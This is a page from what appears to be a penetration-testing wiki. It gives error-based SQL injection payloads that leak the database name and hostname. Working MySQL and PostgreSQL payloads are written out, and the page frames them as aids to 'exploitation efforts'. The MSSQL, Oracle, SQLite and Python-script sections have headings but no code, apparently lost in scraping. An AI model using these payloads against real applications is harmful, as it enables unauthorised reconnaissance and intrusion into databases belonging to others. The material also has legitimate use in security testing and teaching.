search

πŸˆ‚οΈExtracting Database Name and Hostname Using Forced Errors

These advanced error-based SQL injection techniques, you can extract crucial information such as the database name and hostname, which can further aid in your exploitation efforts.

hashtag
MySQL

Extracting Database Name

  • Use error-based injection to extract the database name.

    ' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT database()), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --

Extracting Hostname

  • Use error-based injection to extract the hostname.

    ' AND (SELECT 1 FROM (SELECT COUNT(*), CONCAT((SELECT @@hostname), 0x3a, FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) y) --

hashtag
PostgreSQL

Extracting Database Name

  • Use error-based injection to extract the current database name.

    ' AND 1=CAST((SELECT current_database()) AS INT) --

Extracting Hostname

  • PostgreSQL does not directly provide a function for hostname, but you can use other metadata queries or built-in extensions like inet_server_addr.

    ' AND 1=CAST((SELECT inet_server_addr()) AS INT) --

hashtag
MSSQL

Extracting Database Name

  • Use error-based injection to extract the current database name.

Extracting Hostname

  • Use error-based injection to extract the server hostname.

hashtag
Oracle

Extracting Database Name

  • Use error-based injection to extract the current database name.

Extracting Hostname

  • Use error-based injection to extract the hostname.

hashtag
SQLite

Extracting Database Name

  • SQLite uses a single database per file, but you can force errors to reveal database-related information.

Extracting Hostname

  • SQLite does not inherently have a hostname since it’s a file-based database. However, you can infer file paths which might give clues.

hashtag
Python Script to Automate the Process

PreviousAdvanced Methods to Forcefully Generate Errors on Various DBMSNextSome More Advanced Payloads and Explanation.

Last updated